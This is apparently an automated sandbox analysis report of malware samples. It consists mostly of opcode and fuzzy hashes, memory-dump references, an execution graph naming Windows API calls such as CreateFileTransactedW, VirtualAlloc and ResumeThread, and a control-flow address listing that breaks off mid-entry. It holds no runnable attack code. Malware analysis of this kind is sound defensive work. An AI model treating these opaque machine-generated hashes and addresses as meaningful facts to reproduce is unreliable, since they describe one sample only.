                                                              • Instruction ID: c1c79c2b616f15e57fc9764d458b235eadd94cd3e06092581fcd0e9bac07f107
                                                              • Opcode Fuzzy Hash: 3a822a3a2e05d4f2607759bea8d8bfc954176a809499ebfe304928b7002b486a
                                                              • Instruction Fuzzy Hash: DA313B9081C5D64FF33AA72844645787B79EF5134071846BBD09ECB8CBD92CF8829B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e2ea53f4ea1e2220ad3af4f1953e7c66419ed932b8739d81c673cfa5cff4c4b
                                                              • Instruction ID: 6740d9a1989505951e975e16c1f7ef8a51ddeb4f0020177bfc3fef109f7563df
                                                              • Opcode Fuzzy Hash: 0e2ea53f4ea1e2220ad3af4f1953e7c66419ed932b8739d81c673cfa5cff4c4b
                                                              • Instruction Fuzzy Hash: A121D371E0C9894FFB79BA6898126A87BF0FF45390F54017AD00EC3682D91C98478B55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b10562e4211162e4679ea5b4c074bb9d2113a781a5bfaf99e11e5929dcc02169
                                                              • Instruction ID: bb2c27b03678df9dd4bee4966829c3951c619f0499f2274b785c122454ec1a57
                                                              • Opcode Fuzzy Hash: b10562e4211162e4679ea5b4c074bb9d2113a781a5bfaf99e11e5929dcc02169
                                                              • Instruction Fuzzy Hash: BB31F870E1895D9FDFA9EB18C455AE9B7B1FB68310F0001AED00EE3291CE39A981CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 982932698e587e2e59af37c30bb67ff1a7370b8bd973b36eed2412be4c21364e
                                                              • Instruction ID: 962b4808d1be167514794a2aca215e6da70118888993cc77abd49f7b97e8926a
                                                              • Opcode Fuzzy Hash: 982932698e587e2e59af37c30bb67ff1a7370b8bd973b36eed2412be4c21364e
                                                              • Instruction Fuzzy Hash: 6A212F70F1C94A9FEB59EE68D5919A8B7B2FF54350B10413AD01ED3682CF28B812CB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a29b8834b8dd8fee28d9eaa8054c44b3fb9a6aa5409b207d97ff44ea443ff873
                                                              • Instruction ID: 70af246a5a5ac08dbb39ec782625577c9f959c9f48cb0c41dff0c56383e1bb0c
                                                              • Opcode Fuzzy Hash: a29b8834b8dd8fee28d9eaa8054c44b3fb9a6aa5409b207d97ff44ea443ff873
                                                              • Instruction Fuzzy Hash: 2C218D71E0C98D9FEBA5EF58C8909ECBBB1FF59340F54017AD00EE3291DA28A8058B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20e825865934ef3152b9a8a8cfabbf61b8f44599a7ea09d27e080dc96db4511a
                                                              • Instruction ID: eaccc2398247c7602aec04dc7742ac2f2692c368f00a8e828c2e1de826fd561c
                                                              • Opcode Fuzzy Hash: 20e825865934ef3152b9a8a8cfabbf61b8f44599a7ea09d27e080dc96db4511a
                                                              • Instruction Fuzzy Hash: 9B216D75D1C99D9FEBA8EF58C4905ECBBB1FF68340F51017AD00EE3281DA39A9058B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05f0793caa62519ea0b1b7081b325e93b24e2f3ebb62172071ee3a5e7a28cb86
                                                              • Instruction ID: 25c96feb932c8ad0a957dae223bbe1a8553a3c1b25172557fd712d8d166a3301
                                                              • Opcode Fuzzy Hash: 05f0793caa62519ea0b1b7081b325e93b24e2f3ebb62172071ee3a5e7a28cb86
                                                              • Instruction Fuzzy Hash: 74118F31A1DA8A4EFBB4BE2484015F673E1EF54391F80063BD44EC3592CE2CE8458A60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7973edb1dc1028b276b0c55571a87b19ff84355aa8e51e1ad7053121ab1c5e1d
                                                              • Instruction ID: 1fd21cf21da6aa3a901c7800294ff359aa9553c175dec6ad8027caaefd1fafd7
                                                              • Opcode Fuzzy Hash: 7973edb1dc1028b276b0c55571a87b19ff84355aa8e51e1ad7053121ab1c5e1d
                                                              • Instruction Fuzzy Hash: 07116A31A1DA8A5EFB74BA2494129AA77A1EF543D1F00453BD44EC2592CE2DE8058B60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e3cc72d50db4bf7a15d7bf13bec2ebe2f3860f346dc18bf06b998c008314ce8
                                                              • Instruction ID: dc4567986c9930e7532d8f53fb4c10a5af424a8a20674b959c4dc1594ba13f04
                                                              • Opcode Fuzzy Hash: 9e3cc72d50db4bf7a15d7bf13bec2ebe2f3860f346dc18bf06b998c008314ce8
                                                              • Instruction Fuzzy Hash: 7911403170DA4A8FF728AE18D4116E877A0EF843A2F14013BE90DC36D1CA2DE840CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1abca376b6bfba3bfdab3c0ac1ed4dce6e95dacb620fc89c6d609b98a5d0143
                                                              • Instruction ID: 0f7a02cf510f2c05f5d6e5deda24b8678300794e66c6cb5ea432704337983072
                                                              • Opcode Fuzzy Hash: d1abca376b6bfba3bfdab3c0ac1ed4dce6e95dacb620fc89c6d609b98a5d0143
                                                              • Instruction Fuzzy Hash: 7D11403170C68A8FF769AE18D4156E473A0EF443A2F54063BE90DC32D1CB2CE8518B60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0faea8e9a8e7119b074b4dc22b3df935090ffea9f389dfc0444507a80da0796c
                                                              • Instruction ID: 5aa4df71011c244897514305ae5fd5829926394dfcaa82b951601e4eab03ccb0
                                                              • Opcode Fuzzy Hash: 0faea8e9a8e7119b074b4dc22b3df935090ffea9f389dfc0444507a80da0796c
                                                              • Instruction Fuzzy Hash: 76014B7090898C8FCFA8EF18C854BE8B7B4EBA8315F1441EAC40DE7291CA35A9C1CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e12064b05b8686e4b7c4c8d0c77565bb2749a6563f2b3dc0b7d0bbc2fdc5dc63
                                                              • Instruction ID: cb1309b6cef8ba45cfa49fe1a975f357e3bef066d6b428b4636b73b0bc62ded2
                                                              • Opcode Fuzzy Hash: e12064b05b8686e4b7c4c8d0c77565bb2749a6563f2b3dc0b7d0bbc2fdc5dc63
                                                              • Instruction Fuzzy Hash: CA01287090898C8FCFA8EF18C858BE8B7B0EBA8315F1441AAD40DE7291CA3599C1CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e56b1f0c9e6aa46665c89e471db52dc03e97f2376a44a59ab1233d3c9793466
                                                              • Instruction ID: 35605cfb4f9cae70a01de7f7654894523ecb1f81fe91384b45cacf7053e080a9
                                                              • Opcode Fuzzy Hash: 3e56b1f0c9e6aa46665c89e471db52dc03e97f2376a44a59ab1233d3c9793466
                                                              • Instruction Fuzzy Hash: B3F08C6048E2D61FD7231B7818268E03FB49E076A070A41FBE484CB8A3D80D858BC322
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0379f1d0e70af64fa7256e79c849fba1fe6b36f8867259c25d577eb2943e83ee
                                                              • Instruction ID: fb68d8b445e1f443dda34ff4eb5bacb05c32440e31cd8477b2d876ed8a8e5912
                                                              • Opcode Fuzzy Hash: 0379f1d0e70af64fa7256e79c849fba1fe6b36f8867259c25d577eb2943e83ee
                                                              • Instruction Fuzzy Hash: 9AF0903184E2C59FE726EF7088115E53FB4EF47254B1900FBD489C70A2C56D960ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99b8ab9407f4fa21584cafd4291c5c0b794b68604842eebb0a8072687f69a682
                                                              • Instruction ID: 46a6ee9541dce6910f0ce2845f7d8e78d9971c5820df3eade9115cfa3062c40b
                                                              • Opcode Fuzzy Hash: 99b8ab9407f4fa21584cafd4291c5c0b794b68604842eebb0a8072687f69a682
                                                              • Instruction Fuzzy Hash: 1FF0627144D2C59FE322AF7088555D57FB4AF42250B5840EBE4898B0A2D52C9646CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 596ac7f7fe12048eaa3be30a70952a2d65e317ec1774ba9d7416dac266f11e3c
                                                              • Instruction ID: e27421ca614951471a3138219b5ac1269df60cf451d673c5aa2a6e7db902d2e5
                                                              • Opcode Fuzzy Hash: 596ac7f7fe12048eaa3be30a70952a2d65e317ec1774ba9d7416dac266f11e3c
                                                              • Instruction Fuzzy Hash: 79D0122185F7D60FDB26BB7508160987FA0AF13594FCD45FFD0489B0D3D48D48598741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
                                                              • Instruction ID: 4704e87652d85ce8349f7875a365ba86e3e7e3f1f2244dd0e00996685b1d8066
                                                              • Opcode Fuzzy Hash: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
                                                              • Instruction Fuzzy Hash: 38D0CA65A0D6D3CDF239BE2282202BE65B19F04380E70043FC0AF41EC1CD1EF8416E12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
                                                              • Instruction ID: 1b3945bca545df5b7a8f179cb771f9d35fc95fc1e2a52d10c5a5953aab9a8a79
                                                              • Opcode Fuzzy Hash: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
                                                              • Instruction Fuzzy Hash: 54D0C920A0C5D78DF2387E01802027991B05F00B81FE0403FE09F618D5CD1CF5036E0E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1df8ec1b2276e4f21e7e44ab98a2a9294dbe63b6dc9a3e4a15876ac67ac0012a
                                                              • Instruction ID: c2780b3e8a551d6ff5c0023d0354161d9c1ec32eb81a41fa67deb01cc7bd70a3
                                                              • Opcode Fuzzy Hash: 1df8ec1b2276e4f21e7e44ab98a2a9294dbe63b6dc9a3e4a15876ac67ac0012a
                                                              • Instruction Fuzzy Hash: DDB01200F0C387AFF5303CF0084003D00A00B442C0FD00637D10F491C3DD4CB8011A54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe024d7caf76da19ee77b13c43f71042a6ae10138f4b956fec9464724dc46fba
                                                              • Instruction ID: fd2cb6cd08c242a6eb9b2022fff45717040956094a8f0ca83dd3a33ae5382348
                                                              • Opcode Fuzzy Hash: fe024d7caf76da19ee77b13c43f71042a6ae10138f4b956fec9464724dc46fba
                                                              • Instruction Fuzzy Hash: 9FB01200F0C283CFF13038B0088103C00B01B052C1E900533D10F55AC7DC5CF8401A50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d4dc4b214ebee9f362b5336a8f0ead6a3224fcca0ced91cd7e4c7d9f432affc
                                                              • Instruction ID: 5ff0e2e58be74ba01c62582b07929e6448912352068698b421e7eb29eca28288
                                                              • Opcode Fuzzy Hash: 6d4dc4b214ebee9f362b5336a8f0ead6a3224fcca0ced91cd7e4c7d9f432affc
                                                              • Instruction Fuzzy Hash: F2819370908A8D8FEBA8EF18C8457E97BE1FF59350F10412EE84DC7291DB749985CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -_^H$-_^J$-_^L$-_^N
                                                              • API String ID: 0-1308837779
                                                              • Opcode ID: b8ee6cbc31d57d68a3c9e1340efff16fc2f3c12cf0fe83fc1cb37fa40d964bff
                                                              • Instruction ID: 59c866a5357090b5d091b85c047121f8f40fb5b174413cf870d2d892f15890e7
                                                              • Opcode Fuzzy Hash: b8ee6cbc31d57d68a3c9e1340efff16fc2f3c12cf0fe83fc1cb37fa40d964bff
                                                              • Instruction Fuzzy Hash: A9D0C9DD8194B61ED30457B028F23FA2AC4950135CBB03B27D966CD483E549D2C7E1A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:19.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:26
                                                              Total number of Limit Nodes:2
                                                              execution_graph 15101 7ff848f39ebd 15103 7ff848f9ffe0 15101->15103 15102 7ff848fa0052 15103->15102 15106 7ff848f9f1d0 15103->15106 15105 7ff848fa00c9 15108 7ff848f9f1db 15106->15108 15107 7ff848f9f27e 15107->15105 15108->15107 15110 7ff848f9f297 15108->15110 15111 7ff848f9f2a2 15110->15111 15112 7ff848f9f2ea ResumeThread 15110->15112 15111->15107 15114 7ff848f9f3b4 15112->15114 15114->15107 15115 7ff848f3d5d1 15116 7ff848f3d5ed GetSystemInfo 15115->15116 15118 7ff848f3d6c5 15116->15118 15093 7ff848f3a390 15094 7ff848f3a39c 15093->15094 15097 7ff848f39fb0 15094->15097 15096 7ff848f3a400 15098 7ff848f39fb9 CreateFileTransactedW 15097->15098 15100 7ff848f3bba8 15098->15100 15100->15096 15085 7ff848f3bc35 15086 7ff848f3bc5f WriteFile 15085->15086 15088 7ff848f3bdcf 15086->15088 15089 7ff848f3da35 15090 7ff848f3da5f VirtualAlloc 15089->15090 15092 7ff848f3db7f 15090->15092

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1089 7ff84912d3c7-7ff84912d3c9 1090 7ff84912d3f9-7ff84912d422 1089->1090 1091 7ff84912d3cc-7ff84912d3df 1089->1091 1098 7ff84912d451-7ff84912d462 1090->1098 1099 7ff84912d424-7ff84912d437 1090->1099 1091->1090 1101 7ff84912d491-7ff84912d541 1098->1101 1102 7ff84912d464-7ff84912d48e 1098->1102 1099->1098 1125 7ff84912d5b2-7ff84912d649 1101->1125 1126 7ff84912d543-7ff84912d5ae 1101->1126 1102->1101 1150 7ff84912d64b-7ff84912d6b6 1125->1150 1151 7ff84912d6b9-7ff84912d749 1125->1151 1126->1125 1150->1151 1175 7ff84912d74b-7ff84912d7b6 1151->1175 1176 7ff84912d7b8-7ff84912d849 1151->1176 1175->1176 1201 7ff84912d84b-7ff84912d8b6 1176->1201 1202 7ff84912d8b7-7ff84912d949 1176->1202 1201->1202 1210 7ff84912d94b-7ff84912d9b5 1202->1210 1211 7ff84912d9b6-7ff84912db41 1202->1211 1210->1211 1246 7ff84912dbac-7ff84912dc3b 1211->1246 1247 7ff84912db43-7ff84912db70 1211->1247 1254 7ff84912dc3f-7ff84912dc45 1246->1254 1247->1246 1255 7ff84912dc46 1254->1255 1256 7ff84912dc47-7ff84912dc49 1254->1256 1255->1256 1258 7ff84912dc4b-7ff84912dca0 1256->1258 1259 7ff84912dcb3-7ff84913420b 1256->1259 1258->1254 1267 7ff84912dca2-7ff84912dcb2 1258->1267 1282 7ff849134218-7ff849134221 call 7ff849132db8 1259->1282 1283 7ff8491341f1-7ff849134216 call 7ff849132dc8 1259->1283 1267->1259 1292 7ff8491341fe-7ff849134204 1282->1292
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: o-_^$p-_^
                                                              • API String ID: 0-983702534
                                                              • Opcode ID: 06a5b7d7f708a3a18deae17685d16aba443bc9ac7b46c8574ecb19afddafe3a0
                                                              • Instruction ID: 917e921f58a232e8dfe78e539cedbfe461713ca79c1cd1dea989d9a393588938
                                                              • Opcode Fuzzy Hash: 06a5b7d7f708a3a18deae17685d16aba443bc9ac7b46c8574ecb19afddafe3a0
                                                              • Instruction Fuzzy Hash: 1952876781F1E25FE261BA78A8964E77F60EF022ACF1C43B7D08C4E0D3ED0D65458669
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2492 7ff848f3b98a-7ff848f3b997 2493 7ff848f3b999-7ff848f3b9a1 2492->2493 2494 7ff848f3b9a2-7ff848f3ba68 2492->2494 2493->2494 2498 7ff848f3ba6a-7ff848f3ba81 2494->2498 2499 7ff848f3ba84-7ff848f3bba6 CreateFileTransactedW 2494->2499 2498->2499 2500 7ff848f3bba8 2499->2500 2501 7ff848f3bbae-7ff848f3bc30 2499->2501 2500->2501
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: CreateFileTransacted
                                                              • String ID:
                                                              • API String ID: 2149338676-0
                                                              • Opcode ID: 252ec7838a61f239a696f2125bac55e12d55ed9be2a6f601e774123ea61783df
                                                              • Instruction ID: 95adb8a726f22029990180593bf89f667deb98a7018ced97600a6ddbbb4f3987
                                                              • Opcode Fuzzy Hash: 252ec7838a61f239a696f2125bac55e12d55ed9be2a6f601e774123ea61783df
                                                              • Instruction Fuzzy Hash: 3B912470908A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A984CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2504 7ff848f39fb0-7ff848f3ba68 2509 7ff848f3ba6a-7ff848f3ba81 2504->2509 2510 7ff848f3ba84-7ff848f3bba6 CreateFileTransactedW 2504->2510 2509->2510 2511 7ff848f3bba8 2510->2511 2512 7ff848f3bbae-7ff848f3bc30 2510->2512 2511->2512
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 381c6f205e7dfce6354eeac176e9c76ab3ad3b69b9caadd9e9ffa64d86b9ea50
                                                              • Instruction ID: 3a555060ae18cbedde22edaeb181b6544711591d4ee0b832d580f6ee9aad9f82
                                                              • Opcode Fuzzy Hash: 381c6f205e7dfce6354eeac176e9c76ab3ad3b69b9caadd9e9ffa64d86b9ea50
                                                              • Instruction Fuzzy Hash: 1181D070908A5C8FDB98EF58C894BA9BBF1FB69301F1051AED04EE3651DB75A980CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2515 7ff849126759-7ff849126794 2517 7ff84912679a-7ff84912679f 2515->2517 2518 7ff849126ab1-7ff849126abb 2515->2518 2519 7ff8491267ab-7ff8491267c4 2517->2519 2520 7ff8491267a1-7ff8491267a4 2517->2520 2524 7ff849126abc-7ff849126b2e 2518->2524 2522 7ff8491267d8-7ff849126805 2519->2522 2523 7ff8491267c6-7ff8491267d6 2519->2523 2520->2519 2522->2524 2527 7ff84912680b-7ff849126816 2522->2527 2523->2522 2549 7ff849126b4b-7ff849126b5c 2524->2549 2550 7ff849126b30-7ff849126b36 2524->2550 2529 7ff84912681c-7ff84912682a 2527->2529 2530 7ff8491268d4-7ff8491268d9 2527->2530 2529->2524 2532 7ff849126830-7ff849126841 2529->2532 2533 7ff84912696d-7ff849126977 2530->2533 2534 7ff8491268df-7ff8491268e9 2530->2534 2535 7ff8491268a9-7ff8491268c0 2532->2535 2536 7ff849126843-7ff849126866 2532->2536 2539 7ff849126999-7ff8491269a0 2533->2539 2540 7ff849126979-7ff849126984 2533->2540 2534->2524 2538 7ff8491268ef-7ff849126903 2534->2538 2535->2524 2544 7ff8491268c6-7ff8491268ce 2535->2544 2541 7ff849126908-7ff84912690d 2536->2541 2542 7ff84912686c-7ff84912687f 2536->2542 2543 7ff8491269a3-7ff8491269ad 2538->2543 2539->2543 2558 7ff84912698b-7ff849126997 2540->2558 2551 7ff849126883-7ff8491268a7 2541->2551 2542->2551 2543->2524 2548 7ff8491269b3-7ff8491269cb 2543->2548 2544->2529 2544->2530 2548->2524 2552 7ff8491269d1-7ff8491269e9 2548->2552 2555 7ff849126b6d-7ff849126b90 2549->2555 2556 7ff849126b5e-7ff849126b6c 2549->2556 2553 7ff849126b38-7ff849126b49 2550->2553 2554 7ff849126b91-7ff84912be33 2550->2554 2551->2535 2563 7ff849126912-7ff849126915 2551->2563 2552->2524 2559 7ff8491269ef-7ff849126a23 2552->2559 2553->2549 2553->2550 2597 7ff84912bdfb-7ff84912be37 2554->2597 2598 7ff84912be3e-7ff84912be49 2554->2598 2556->2555 2558->2539 2559->2524 2583 7ff849126a29-7ff849126a3c 2559->2583 2564 7ff84912692b-7ff849126938 2563->2564 2565 7ff849126917-7ff849126927 2563->2565 2564->2524 2568 7ff84912693e-7ff84912696c 2564->2568 2565->2564 2586 7ff849126a9f-7ff849126ab0 2583->2586 2587 7ff849126a3e-7ff849126a49 2583->2587 2587->2586 2592 7ff849126a4b-7ff849126a62 2587->2592 2599 7ff849126a73-7ff849126a95 2592->2599 2600 7ff849126a64-7ff849126a72 2592->2600 2615 7ff84912be5e-7ff84912be90 2597->2615 2616 7ff84912be15-7ff84912be30 2597->2616 2604 7ff84912be4b-7ff84912be5c 2598->2604 2605 7ff84912beb1-7ff84912bf87 2598->2605 2599->2586 2600->2599 2604->2598 2619 7ff84912bf5d-7ff84912bf75 2605->2619 2620 7ff84912bed6-7ff84912bed9 2605->2620 2627 